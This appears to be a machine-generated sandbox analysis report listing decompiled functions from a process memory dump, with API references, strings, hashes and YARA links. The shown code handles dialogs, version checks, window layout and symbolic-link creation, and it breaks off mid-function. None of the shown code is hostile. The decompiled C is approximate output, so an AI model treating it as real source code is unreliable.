SetDlgItemTextW.USER32(?,0000006A,?), ref: 0017BAD7
FindClose.KERNEL32(00000000), ref: 0017BADE
_swprintf.LIBCMT ref: 0017BB37
SetDlgItemTextW.USER32(?,00000068,?), ref: 0017BB4A
SendDlgItemMessageW.USER32(?,00000067,00000170,?,00000000), ref: 0017BB67
FileTimeToLocalFileTime.KERNEL32(?,?,?), ref: 0017BB87
FileTimeToSystemTime.KERNEL32(?,?), ref: 0017BB97
GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 0017BBB1
GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 0017BBC9
_swprintf.LIBCMT ref: 0017BBF5
SetDlgItemTextW.USER32(?,0000006B,?), ref: 0017BC08
_swprintf.LIBCMT ref: 0017BC5C
SetDlgItemTextW.USER32(?,00000069,?), ref: 0017BC6F

Part of subcall function 0017A63C: GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 0017A662
Part of subcall function 0017A63C: GetNumberFormatW.KERNEL32 ref: 0017A6B1

Strings

%s %s %s, xrefs: 0017BAB2, 0017BBE7
REPLACEFILEDLG, xrefs: 0017B907
%s %s, xrefs: 0017BB29, 0017BC4E

Memory Dump Source

Source File: 00000004.00000002.660423255.0000000000161000.00000020.00020000.sdmp, Offset: 00160000, based on PE: true

Associated: 00000004.00000002.660415569.0000000000160000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660448924.0000000000193000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660460357.000000000019E000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660470418.00000000001A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660483667.00000000001C1000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660489666.00000000001C2000.00000002.00020000.sdmp Download File

Similarity

API ID: ItemTime$File$Text$Format$_swprintf$MessageSend$DateFindLocalSystem$CloseDialogFirstFocusInfoLocaleNumberWindow__vswprintf_c_l
String ID: %s %s$%s %s %s$REPLACEFILEDLG
API String ID: 797121971-1840816070
Opcode ID: 662d0ec2fc51a246309da3d399ce17d9eec6d487da5b1b961416e3ffad3dad24
Instruction ID: e1614299e4b61ab96f97221b806c88935fed8b952ce88fbcec7f3e3f34c05784
Opcode Fuzzy Hash: 662d0ec2fc51a246309da3d399ce17d9eec6d487da5b1b961416e3ffad3dad24
Instruction Fuzzy Hash: 4B9193B2248348BBD7319BA0DC89FFB7BACEB49704F044819F749D2491DB719A45CB62

Uniqueness

Uniqueness Score: -1.00%

Function 00166EC9, Relevance: 3.0, APIs: 2, Instructions: 17
windowCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E00166EC9(WCHAR* _a4, long _a8) {
				long _t3;
				signed int _t5;

				_t3 = GetLastError();
				if(_t3 == 0) {
					return 0;
				}
				_t5 = FormatMessageW(0x1200, 0, _t3, 0x400, _a4, _a8, 0);
				asm("sbb eax, eax");
				return  ~( ~_t5);
			}

0x00166ec9
0x00166ed1
0x00000000
0x00166ef8
0x00166eea
0x00166ef2
0x00000000

APIs

GetLastError.KERNEL32(0017117C,?,00000200), ref: 00166EC9
FormatMessageW.KERNEL32(00001200,00000000,00000000,00000400,?,?,00000000), ref: 00166EEA

Memory Dump Source

Source File: 00000004.00000002.660423255.0000000000161000.00000020.00020000.sdmp, Offset: 00160000, based on PE: true

Associated: 00000004.00000002.660415569.0000000000160000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660448924.0000000000193000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660460357.000000000019E000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660470418.00000000001A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660483667.00000000001C1000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660489666.00000000001C2000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorFormatLastMessage
String ID:
API String ID: 3479602957-0
Opcode ID: 9bf909b0fff9c4a8e6adb6b991d626ece483385f0593f17442e8cab355c625f7
Instruction ID: 5c6a3fc91ae3004150dfed5cadfbb2261f767b3e2ee64c463109d1dbbdc83860
Opcode Fuzzy Hash: 9bf909b0fff9c4a8e6adb6b991d626ece483385f0593f17442e8cab355c625f7
Instruction Fuzzy Hash: 8FD0C9353C8302BFEB114A79CC06F2BBBA4A755B82F248515B366E94E0CA719464D629

Uniqueness

Uniqueness Score: -1.00%

Function 0016ACF5, Relevance: 1.5, APIs: 1, Instructions: 28
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0016ACF5() {
				struct _OSVERSIONINFOW _v280;
				signed int _t6;
				intOrPtr _t12;
				intOrPtr _t13;

				_t12 =  *0x19e020; // 0x2
				if(_t12 != 0xffffffff) {
					_t6 =  *0x1a0f60; // 0xa
					_t13 =  *0x1a0f64; // 0x0
				} else {
					_v280.dwOSVersionInfoSize = 0x114;
					GetVersionExW( &_v280);
					_t12 = _v280.dwPlatformId;
					_t6 = _v280.dwMajorVersion;
					_t13 = _v280.dwMinorVersion;
					 *0x19e020 = _t12;
					 *0x1a0f60 = _t6;
					 *0x1a0f64 = _t13;
				}
				if(_t12 != 2) {
					return 0x501;
				} else {
					return (_t6 << 8) + _t13;
				}
			}

0x0016acf8
0x0016ad07
0x0016ad45
0x0016ad4a
0x0016ad09
0x0016ad0f
0x0016ad1a
0x0016ad20
0x0016ad26
0x0016ad2c
0x0016ad32
0x0016ad38
0x0016ad3d
0x0016ad3d
0x0016ad53
0x00000000
0x0016ad55
0x00000000
0x0016ad58

APIs

GetVersionExW.KERNEL32(?), ref: 0016AD1A

Memory Dump Source

Source File: 00000004.00000002.660423255.0000000000161000.00000020.00020000.sdmp, Offset: 00160000, based on PE: true

Associated: 00000004.00000002.660415569.0000000000160000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660448924.0000000000193000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660460357.000000000019E000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660470418.00000000001A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660483667.00000000001C1000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660489666.00000000001C2000.00000002.00020000.sdmp Download File

Similarity

API ID: Version
String ID:
API String ID: 1889659487-0
Opcode ID: ad310d2f73bd17ec2b34762c2cfa0a772e755258a7bf15c974ef0e3bf39afd41
Instruction ID: 4220e7b7a38217d057d6d9f9b015ddaf27a9a525599e76d3e86e63ae7f165f50
Opcode Fuzzy Hash: ad310d2f73bd17ec2b34762c2cfa0a772e755258a7bf15c974ef0e3bf39afd41
Instruction Fuzzy Hash: B6F030B490021C8FC728CF68EC416E973B5FB5D715F600296E91563B54D370AD90CE61

Uniqueness

Uniqueness Score: -1.00%

Function 0018B710, Relevance: 1.3, APIs: 1, Instructions: 5
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0018B710() {
				signed int _t3;

				_t3 = GetProcessHeap();
				 *0x1c16ec = _t3;
				return _t3 & 0xffffff00 | _t3 != 0x00000000;
			}

0x0018b710
0x0018b718
0x0018b720

APIs

GetProcessHeap.KERNEL32 ref: 0018B710

Memory Dump Source

Source File: 00000004.00000002.660423255.0000000000161000.00000020.00020000.sdmp, Offset: 00160000, based on PE: true

Associated: 00000004.00000002.660415569.0000000000160000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660448924.0000000000193000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660460357.000000000019E000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660470418.00000000001A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660483667.00000000001C1000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660489666.00000000001C2000.00000002.00020000.sdmp Download File

Similarity

API ID: HeapProcess
String ID:
API String ID: 54951025-0
Opcode ID: 0f617042c67adba4fb000eb5608d90eb525f006d8ffc79f9510f1d04392cb76e
Instruction ID: b29bf36c1656cdafaf209e2ec3567d6596a2e160783142341efc1434fee0a9d8
Opcode Fuzzy Hash: 0f617042c67adba4fb000eb5608d90eb525f006d8ffc79f9510f1d04392cb76e
Instruction Fuzzy Hash: 92A011B02002008B83008F32AA082083AA8AB02280308822AA008C2830EA2080A08F00

Uniqueness

Uniqueness Score: -1.00%

Function 0016DA98, Relevance: 26.5, APIs: 12, Strings: 3, Instructions: 236
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E0016DA98(struct HWND__* __ecx, void* __eflags, intOrPtr _a8, char _a12) {
				struct HWND__* _v8;
				short _v2048;
				char _v2208;
				char _v2288;
				signed int _v2292;
				char _v2300;
				intOrPtr _v2304;
				struct tagRECT _v2320;
				intOrPtr _v2324;
				intOrPtr _v2336;
				struct tagRECT _v2352;
				struct tagRECT _v2368;
				signed int _v2376;
				char _v2377;
				intOrPtr _v2384;
				intOrPtr _v2393;
				void* __ebx;
				void* __esi;
				signed int _t96;
				struct HWND__* _t107;
				signed int _t120;
				signed int _t135;
				void* _t151;
				void* _t156;
				char _t157;
				void* _t158;
				signed int _t159;
				intOrPtr _t161;
				void* _t164;
				void* _t170;
				long _t171;
				signed int _t175;
				signed int _t179;
				signed int _t186;
				struct HWND__* _t187;
				struct HWND__* _t188;
				void* _t189;
				void* _t192;
				signed int _t193;
				long _t194;
				void* _t201;
				int* _t202;
				struct HWND__* _t203;
				void* _t205;
				void* _t206;
				void* _t208;
				void* _t210;
				void* _t214;

				_t203 = __ecx;
				_v2368.bottom = __ecx;
				E0016400A( &_v2208, 0x50, L"$%s:", _a8);
				_t208 =  &_v2368 + 0x10;
				E00171596( &_v2208,  &_v2288, 0x50);
				_t96 = E00183630( &_v2300);
				_t187 = _v8;
				_t156 = 0;
				_v2376 = _t96;
				_t210 =  *0x19e5f4 - _t156; // 0x63
				if(_t210 <= 0) {
					L8:
					_t157 = E0016D0EE(_t156, _t203, _t189, _t214, _a8,  &(_v2368.right),  &(_v2368.top));
					_v2377 = _t157;
					GetWindowRect(_t187,  &_v2352);
					GetClientRect(_t187,  &(_v2320.top));
					_t170 = _v2352.right - _v2352.left + 1;
					_t179 = _v2320.bottom;
					_t192 = _v2352.bottom - _v2352.top + 1;
					_v2368.right = 0x64;
					_t205 = _t192 - _v2304;
					_v2368.bottom = _t170 - _t179;
					if(_t157 == 0) {
						L15:
						_t222 = _a12;
						if(_a12 == 0 && E0016D171(_t157, _v2368.bottom, _t222, _a8, L"CAPTION",  &_v2048, 0x400) != 0) {
							SetWindowTextW(_t187,  &_v2048);
						}
						L18:
						_t206 = _t205 - GetSystemMetrics(8);
						_t107 = GetWindow(_t187, 5);
						_t188 = _t107;
						_v2368.bottom = _t188;
						if(_t157 == 0) {
							L24:
							return _t107;
						}
						_t158 = 0;
						while(_t188 != 0) {
							__eflags = _t158 - 0x200;
							if(_t158 >= 0x200) {
								goto L24;
							}
							GetWindowRect(_t188,  &_v2320);
							_t171 = _v2320.top.left;
							_t193 = 0x64;
							asm("cdq");
							_t194 = _v2320.left;
							asm("cdq");
							_t120 = (_t171 - _t206 - _v2336) * _v2368.top;
							asm("cdq");
							_t175 = 0x64;
							asm("cdq");
							asm("cdq");
							 *0x1c2150(_t188, 0, (_t194 - (_v2352.right - _t120 % _t175 >> 1) - _v2352.bottom) * _v2368.right / _t175, _t120 / _t175, (_v2320.right - _t194 + 1) * _v2368.right / _v2352.top, (_v2320.bottom - _t171 + 1) * _v2368.top / _t193, 0x204);
							_t107 = GetWindow(_t188, 2);
							_t188 = _t107;
							__eflags = _t188 - _v2384;
							if(_t188 == _v2384) {
								goto L24;
							}
							_t158 = _t158 + 1;
							__eflags = _t158;
						}
						goto L24;
					}
					if(_a12 != 0) {
						goto L18;
					}
					_t159 = 0x64;
					asm("cdq");
					_t135 = _v2292 * _v2368.top;
					_t161 = _t179 * _v2368.right / _t159 + _v2352.right;
					_v2324 = _t161;
					asm("cdq");
					_t186 = _t135 % _v2352.top;
					_v2352.left = _t135 / _v2352.top + _t205;
					asm("cdq");
					asm("cdq");
					_t201 = (_t192 - _v2352.left - _t186 >> 1) + _v2336;
					_t164 = (_t170 - _t161 - _t186 >> 1) + _v2352.bottom;
					if(_t164 < 0) {
						_t164 = 0;
					}
					if(_t201 < 0) {
						_t201 = 0;
					}
					 *0x1c2150(_t187, 0, _t164, _t201, _v2324, _v2352.left,  !(GetWindowLongW(_t187, 0xfffffff0) >> 0xa) & 0x00000002 | 0x00000204);
					GetWindowRect(_t187,  &_v2368);
					_t157 = _v2393;
					goto L15;
				} else {
					_t202 = 0x19e154;
					do {
						if( *_t202 > 0) {
							_t9 =  &(_t202[1]); // 0x1946b8
							_t151 = E00185EC0( &_v2288,  *_t9, _t96);
							_t208 = _t208 + 0xc;
							if(_t151 == 0) {
								_t12 =  &(_t202[1]); // 0x1946b8
								if(E0016D2C8(_t156, _t203, _t202,  *_t12,  &_v2048, 0x400) != 0) {
									SetDlgItemTextW(_t187,  *_t202,  &_v2048);
								}
							}
							_t96 = _v2368.top;
						}
						_t156 = _t156 + 1;
						_t202 =  &(_t202[3]);
						_t214 = _t156 -  *0x19e5f4; // 0x63
					} while (_t214 < 0);
					goto L8;
				}
			}

0x0016dab0
0x0016daba
0x0016dabe
0x0016dac3
0x0016dad5
0x0016dadf
0x0016dae4
0x0016daeb
0x0016daee
0x0016daf2
0x0016daf8
0x0016db55
0x0016db6d
0x0016db75
0x0016db79
0x0016db85
0x0016db97
0x0016db9e
0x0016dba2
0x0016dba5
0x0016dbad
0x0016dbb3
0x0016dbb9
0x0016dc5c
0x0016dc5c
0x0016dc64
0x0016dc95
0x0016dc95
0x0016dc9b
0x0016dca6
0x0016dca8
0x0016dcae
0x0016dcb0
0x0016dcb6
0x0016dd68
0x0016dd68
0x0016dd68
0x0016dcbc
0x0016dd56
0x0016dcc3
0x0016dcc9
0x00000000
0x00000000
0x0016dcd5
0x0016dcdf
0x0016dcf4
0x0016dcf9
0x0016dcfc
0x0016dd12
0x0016dd1a
0x0016dd1c
0x0016dd1d
0x0016dd25
0x0016dd37
0x0016dd3e
0x0016dd47
0x0016dd4d
0x0016dd4f
0x0016dd53
0x00000000
0x00000000
0x0016dd55
0x0016dd55
0x0016dd55
0x00000000
0x0016dd56
0x0016dbc7
0x00000000
0x00000000
0x0016dbd4
0x0016dbd7
0x0016dbe0
0x0016dbe5
0x0016dbeb
0x0016dbef
0x0016dbf0
0x0016dbf6
0x0016dc00
0x0016dc07
0x0016dc10
0x0016dc14
0x0016dc18
0x0016dc1a
0x0016dc1a
0x0016dc1e
0x0016dc20
0x0016dc20
0x0016dc46
0x0016dc52
0x0016dc58
0x00000000
0x0016dafa
0x0016dafa
0x0016daff
0x0016db02
0x0016db05
0x0016db0d
0x0016db12
0x0016db17
0x0016db28
0x0016db32
0x0016db3f
0x0016db3f
0x0016db32
0x0016db45
0x0016db45
0x0016db49
0x0016db4a
0x0016db4d
0x0016db4d
0x00000000
0x0016daff

APIs

_swprintf.LIBCMT ref: 0016DABE

Part of subcall function 0016400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 0016401D

Part of subcall function 00171596: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000200,00000000,00000000,?,001A0EE8,00000200,0016D202,00000000,?,00000050,001A0EE8), ref: 001715B3

_strlen.LIBCMT ref: 0016DADF
SetDlgItemTextW.USER32(?,0019E154,?), ref: 0016DB3F
GetWindowRect.USER32(?,?), ref: 0016DB79
GetClientRect.USER32(?,?), ref: 0016DB85
GetWindowLongW.USER32(?,000000F0), ref: 0016DC25
GetWindowRect.USER32(?,?), ref: 0016DC52
SetWindowTextW.USER32(?,?), ref: 0016DC95
GetSystemMetrics.USER32(00000008), ref: 0016DC9D
GetWindow.USER32(?,00000005), ref: 0016DCA8
GetWindowRect.USER32(00000000,?), ref: 0016DCD5
GetWindow.USER32(00000000,00000002), ref: 0016DD47

Strings

CAPTION, xrefs: 0016DC77
d, xrefs: 0016DBA5
$%s:, xrefs: 0016DAB2

Memory Dump Source

Source File: 00000004.00000002.660423255.0000000000161000.00000020.00020000.sdmp, Offset: 00160000, based on PE: true

Associated: 00000004.00000002.660415569.0000000000160000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660448924.0000000000193000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660460357.000000000019E000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660470418.00000000001A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660483667.00000000001C1000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660489666.00000000001C2000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$Rect$Text$ByteCharClientItemLongMetricsMultiSystemWide__vswprintf_c_l_strlen_swprintf
String ID: $%s:$CAPTION$d
API String ID: 2407758923-2512411981
Opcode ID: 69fcb4e15838de0105a378ecf3e2b0b712f1815628afcbd87e77ce5aae09cabf
Instruction ID: 1317c28096216cb647c1039375b7200a27cf8d35e56857bdd3320fd2f48c6952
Opcode Fuzzy Hash: 69fcb4e15838de0105a378ecf3e2b0b712f1815628afcbd87e77ce5aae09cabf
Instruction Fuzzy Hash: B181A072608305AFD710DFA8DD89E6BBBE9EB89704F04092DFA84D3290D770E905CB52

Uniqueness

Uniqueness Score: -1.00%

Function 0016718C, Relevance: 24.8, APIs: 10, Strings: 4, Instructions: 296
fileCOMMON

Download Yara Rule

C-Code - Quality: 83%

			E0016718C(void* __edx) {
				void* __esi;
				signed int _t108;
				void* _t110;
				intOrPtr _t113;
				int _t115;
				intOrPtr _t118;
				signed int _t136;
				int _t142;
				void* _t176;
				void* _t179;
				void* _t184;
				short _t185;
				intOrPtr _t191;
				void* _t196;
				void* _t197;
				void* _t216;
				void* _t217;
				intOrPtr _t218;
				intOrPtr _t220;
				void* _t222;
				WCHAR* _t223;
				intOrPtr _t227;
				short _t231;
				void* _t232;
				intOrPtr _t233;
				short _t235;
				void* _t236;
				void* _t238;
				void* _t239;

				_t217 = __edx;
				E0017E28C(E00191DC5, _t236);
				E0017E360();
				 *((intOrPtr*)(_t236 - 0x1c)) = 1;
				if( *0x1a0eb3 == 0) {
					E00167BF5(L"SeRestorePrivilege");
					E00167BF5(L"SeCreateSymbolicLinkPrivilege");
					 *0x1a0eb3 = 1;
				}
				_t193 = _t236 - 0x30;
				E0016709D(_t236 - 0x30, 0x1418);
				_t191 =  *((intOrPtr*)(_t236 + 0x10));
				 *(_t236 - 4) =  *(_t236 - 4) & 0x00000000;
				E0016FE56(_t236 - 0x1080, _t191 + 0x1104, 0x800);
				 *((intOrPtr*)(_t236 - 0x18)) = E001835B3(_t236 - 0x1080);
				_t226 = _t236 - 0x1080;
				_t222 = _t236 - 0x2080;
				_t108 = E00185808(_t236 - 0x1080, L"\\??\\", 4);
				_t239 = _t238 + 0x10;
				asm("sbb al, al");
				_t110 =  ~_t108 + 1;
				 *(_t236 - 0x10) = _t110;
				if(_t110 != 0) {
					_t226 = _t236 - 0x1078;
					_t184 = E00185808(_t236 - 0x1078, L"UNC\\", 4);
					_t239 = _t239 + 0xc;
					if(_t184 == 0) {
						_t185 = 0x5c;
						 *((short*)(_t236 - 0x2080)) = _t185;
						_t222 = _t236 - 0x207e;
						_t226 = _t236 - 0x1072;
					}
				}
				E001857E6(_t222, _t226);
				_t113 = E001835B3(_t236 - 0x2080);
				_t227 =  *((intOrPtr*)(_t236 + 8));
				_t223 =  *(_t236 + 0xc);
				 *((intOrPtr*)(_t236 - 0x14)) = _t113;
				if( *((char*)(_t227 + 0x6197)) != 0) {
					L9:
					_push(1);
					_push(_t223);
					E0016A04F(_t193, _t236);
					if( *((char*)(_t191 + 0x10f1)) != 0 ||  *((char*)(_t191 + 0x2104)) != 0) {
						_t115 = CreateDirectoryW(_t223, 0);
						__eflags = _t115;
						if(_t115 == 0) {
							goto L27;
						}
						goto L14;
					} else {
						_t176 = CreateFileW(_t223, 0x40000000, 0, 0, 1, 0x80, 0);
						if(_t176 == 0xffffffff) {
							L27:
							 *((char*)(_t236 - 0x1c)) = 0;
							L28:
							E001615A0(_t236 - 0x30);
							 *[fs:0x0] =  *((intOrPtr*)(_t236 - 0xc));
							return  *((intOrPtr*)(_t236 - 0x1c));
						}
						CloseHandle(_t176);
						L14:
						_t118 =  *((intOrPtr*)(_t191 + 0x1100));
						if(_t118 != 3) {
							__eflags = _t118 - 2;
							if(_t118 == 2) {
								L18:
								_t196 =  *(_t236 - 0x30);
								_t218 =  *((intOrPtr*)(_t236 - 0x18));
								 *_t196 = 0xa000000c;
								_t231 = _t218 + _t218;
								 *((short*)(_t196 + 0xa)) = _t231;
								 *((short*)(_t196 + 4)) = 0x10 + ( *((intOrPtr*)(_t236 - 0x14)) + _t218) * 2;
								 *((intOrPtr*)(_t196 + 6)) = 0;
								E001857E6(_t196 + 0x14, _t236 - 0x1080);
								_t60 = _t231 + 2; // 0x3
								_t232 =  *(_t236 - 0x30);
								 *((short*)(_t232 + 0xc)) = _t60;
								 *((short*)(_t232 + 0xe)) =  *((intOrPtr*)(_t236 - 0x14)) +  *((intOrPtr*)(_t236 - 0x14));
								E001857E6(_t232 + ( *((intOrPtr*)(_t236 - 0x18)) + 0xb) * 2, _t236 - 0x2080);
								_t136 =  *(_t236 - 0x10) & 0x000000ff ^ 0x00000001;
								__eflags = _t136;
								 *(_t232 + 0x10) = _t136;
								L19:
								_t197 = CreateFileW(_t223, 0xc0000000, 0, 0, 3, 0x2200000, 0);
								 *(_t236 - 0x10) = _t197;
								if(_t197 == 0xffffffff) {
									goto L27;
								}
								_t142 = DeviceIoControl(_t197, 0x900a4, _t232, ( *(_t232 + 4) & 0x0000ffff) + 8, 0, 0, _t236 - 0x34, 0);
								_t256 = _t142;
								if(_t142 != 0) {
									E00169619(_t236 - 0x30a8);
									 *(_t236 - 4) = 1;
									E00167BD4(_t236 - 0x30a8,  *(_t236 - 0x10));
									_t233 =  *((intOrPtr*)(_t236 + 8));
									asm("sbb ecx, ecx");
									asm("sbb ecx, ecx");
									asm("sbb ecx, ecx");
									E00169D62(_t236 - 0x30a8, _t233,  ~( *(_t233 + 0x72d0)) & _t191 + 0x00001040,  ~( *(_t233 + 0x72d4)) & _t191 + 0x00001048,  ~( *(_t233 + 0x72d8)) & _t191 + 0x00001050);
									E001696D0(_t236 - 0x30a8);
									__eflags =  *((char*)(_t233 + 0x61a8));
									if( *((char*)(_t233 + 0x61a8)) == 0) {
										E0016A444(_t223,  *((intOrPtr*)(_t191 + 0x24)));
									}
									E00169653(_t236 - 0x30a8, _t233);
									goto L28;
								}
								CloseHandle( *(_t236 - 0x10));
								E00161F94(_t256, 0x15, 0, _t223);
								_t154 = GetLastError();
								if(_t154 == 5 || _t154 == 0x522) {
									if(E00170020() == 0) {
										E0016156B(_t236 - 0x80, 0x18);
										_t154 = E00170E37(_t236 - 0x80);
									}
								}
								E0017F190(_t154);
								E00166FC6(0x1a0f50, 9);
								_push(_t223);
								if( *((char*)(_t191 + 0x10f1)) == 0) {
									DeleteFileW();
								} else {
									RemoveDirectoryW();
								}
								goto L27;
							}
							__eflags = _t118 - 1;
							if(_t118 != 1) {
								goto L27;
							}
							goto L18;
						}
						_t216 =  *(_t236 - 0x30);
						_t220 =  *((intOrPtr*)(_t236 - 0x18));
						 *_t216 = 0xa0000003;
						_t235 = _t220 + _t220;
						 *((short*)(_t216 + 0xa)) = _t235;
						 *((short*)(_t216 + 4)) = 0xc + ( *((intOrPtr*)(_t236 - 0x14)) + _t220) * 2;
						 *((intOrPtr*)(_t216 + 6)) = 0;
						E001857E6(_t216 + 0x10, _t236 - 0x1080);
						_t40 = _t235 + 2; // 0x3
						_t232 =  *(_t236 - 0x30);
						 *((short*)(_t232 + 0xc)) = _t40;
						 *((short*)(_t232 + 0xe)) =  *((intOrPtr*)(_t236 - 0x14)) +  *((intOrPtr*)(_t236 - 0x14));
						E001857E6(_t232 + ( *((intOrPtr*)(_t236 - 0x18)) + 9) * 2, _t236 - 0x2080);
						goto L19;
					}
				}
				if( *(_t236 - 0x10) != 0) {
					goto L27;
				}
				_t179 = E0016B832(_t191 + 0x1104);
				_t249 = _t179;
				if(_t179 != 0) {
					goto L27;
				}
				_push(_t191 + 0x1104);
				_push(_t223);
				_push(_t191 + 0x28);
				_push(_t227);
				if(E001679B2(_t217, _t249) == 0) {
					goto L27;
				}
				goto L9;
			}

0x0016718c
0x00167191
0x0016719b
0x001671ad
0x001671b0
0x001671b7
0x001671c1
0x001671c6
0x001671c6
0x001671d1
0x001671d4
0x001671d9
0x001671dc
0x001671f3
0x00167206
0x00167209
0x00167211
0x0016721d
0x00167222
0x00167227
0x00167229
0x0016722b
0x00167230
0x00167234
0x00167242
0x00167247
0x0016724c
0x00167250
0x00167251
0x00167258
0x0016725e
0x0016725e
0x0016724c
0x00167266
0x00167272
0x00167277
0x0016727d
0x00167280
0x0016728a
0x001672c4
0x001672c7
0x001672c8
0x001672c9
0x001672d5
0x0016730c
0x00167312
0x00167314
0x00000000
0x00000000
0x00000000
0x001672e0
0x001672f1
0x001672fa
0x001674b9
0x001674b9
0x001674bd
0x001674c0
0x001674ce
0x001674d8
0x001674d8
0x00167301
0x0016731a
0x0016731a
0x00167323
0x0016738b
0x0016738e
0x00167398
0x00167398
0x0016739b
0x001673a3
0x001673a9
0x001673ac
0x001673b7
0x001673bd
0x001673cb
0x001673d0
0x001673d3
0x001673d6
0x001673df
0x001673f4
0x00167402
0x00167402
0x00167405
0x00167408
0x00167420
0x00167422
0x00167428
0x00000000
0x00000000
0x00167446
0x0016744c
0x0016744e
0x001674e9
0x001674f7
0x001674fb
0x00167500
0x00167511
0x00167524
0x00167537
0x00167542
0x0016754d
0x00167552
0x00167559
0x0016755f
0x0016755f
0x0016756a
0x00000000
0x0016756a
0x00167457
0x00167462
0x00167467
0x00167470
0x00167480
0x00167487
0x0016748f
0x0016748f
0x00167480
0x0016749b
0x001674a4
0x001674b0
0x001674b1
0x001674db
0x001674b3
0x001674b3
0x001674b3
0x00000000
0x001674b1
0x00167390
0x00167392
0x00000000
0x00000000
0x00000000
0x00167392
0x00167325
0x00167328
0x00167330
0x00167336
0x00167339
0x00167344
0x0016734a
0x00167358
0x0016735d
0x00167360
0x00167363
0x0016736c
0x00167381
0x00000000
0x00167386
0x001672d5
0x00167290
0x00000000
0x00000000
0x0016729d
0x001672a2
0x001672a4
0x00000000
0x00000000
0x001672b0
0x001672b1
0x001672b5
0x001672b6
0x001672be
0x00000000
0x00000000
0x00000000

APIs

__EH_prolog.LIBCMT ref: 00167191
CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000001,00000080,00000000,?,00000001), ref: 001672F1
CloseHandle.KERNEL32(00000000), ref: 00167301

Part of subcall function 00167BF5: GetCurrentProcess.KERNEL32(00000020,?), ref: 00167C04
Part of subcall function 00167BF5: GetLastError.KERNEL32 ref: 00167C4A
Part of subcall function 00167BF5: CloseHandle.KERNEL32(?), ref: 00167C59

CreateDirectoryW.KERNEL32(?,00000000,?,00000001), ref: 0016730C
CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,02200000,00000000), ref: 0016741A
DeviceIoControl.KERNEL32 ref: 00167446
CloseHandle.KERNEL32(?), ref: 00167457
GetLastError.KERNEL32 ref: 00167467
RemoveDirectoryW.KERNEL32(?), ref: 001674B3
DeleteFileW.KERNEL32(?), ref: 001674DB

Strings

\??\, xrefs: 00167217
UNC\, xrefs: 0016723C
SeCreateSymbolicLinkPrivilege, xrefs: 001671BC
SeRestorePrivilege, xrefs: 001671B2

Memory Dump Source

Source File: 00000004.00000002.660423255.0000000000161000.00000020.00020000.sdmp, Offset: 00160000, based on PE: true

Associated: 00000004.00000002.660415569.0000000000160000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660448924.0000000000193000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660460357.000000000019E000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660470418.00000000001A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660483667.00000000001C1000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660489666.00000000001C2000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseCreateFileHandle$DirectoryErrorLast$ControlCurrentDeleteDeviceH_prologProcessRemove
String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
API String ID: 3935142422-3508440684
Opcode ID: ab03be82590a2573e967f760409006a5064ceec4679a584c885b89a281a6faaf
Instruction ID: fc87f6a37602f165c2a18a1c8a37d03275c6921d31154a0b7ab61895102f66c0
Opcode Fuzzy Hash: ab03be82590a2573e967f760409006a5064ceec4679a584c885b89a281a6faaf
Instruction Fuzzy Hash: 23B11371904214ABDF21DFA4CC45BEEB7B8FF14704F0444A9F959E7282DB34AA59CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0018C233, Relevance: 19.6, APIs: 13, Instructions: 114
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0018C233(intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _t25;
				intOrPtr* _t26;
				intOrPtr _t28;
				intOrPtr* _t29;
				intOrPtr* _t31;
				intOrPtr* _t45;
				intOrPtr* _t46;
				intOrPtr* _t47;
				intOrPtr* _t55;
				intOrPtr* _t70;
				intOrPtr _t74;

				_t74 = _a4;
				_t2 = _t74 + 0x88; // 0x720043
				_t25 =  *_t2;
				if(_t25 != 0 && _t25 != 0x19ed50) {
					_t3 = _t74 + 0x7c; // 0x654d7463
					_t45 =  *_t3;
					if(_t45 != 0 &&  *_t45 == 0) {
						_t4 = _t74 + 0x84; // 0x0
						_t46 =  *_t4;
						if(_t46 != 0 &&  *_t46 == 0) {
							E001884DE(_t46);
							_t5 = _t74 + 0x88; // 0x720043
